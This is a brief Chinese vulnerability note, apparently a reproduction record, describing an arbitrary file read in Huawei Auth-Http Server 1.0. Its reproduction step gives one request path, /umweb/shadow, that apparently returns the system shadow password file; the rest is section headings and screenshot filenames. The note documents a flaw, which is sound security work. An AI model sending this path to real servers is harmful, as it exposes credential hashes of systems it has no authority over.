华为Auth-Http Server 1.0存在任意文件读取

一、漏洞简介

华为Auth-Http Server 1.0存在任意文件读取漏洞

二、影响版本

三、资产测绘

1699412396641-ceacb9ea-3734-4626-b088-37559c150c3e.png

四、漏洞复现

/umweb/shadow

1699412443472-84c1538e-472c-4434-bbe7-92c7d2f10f2a.png

更新: 2024-02-29 23:57:13
原文: https://www.yuque.com/xiaokp7/ocvun2/idyr2darqkc3u2m2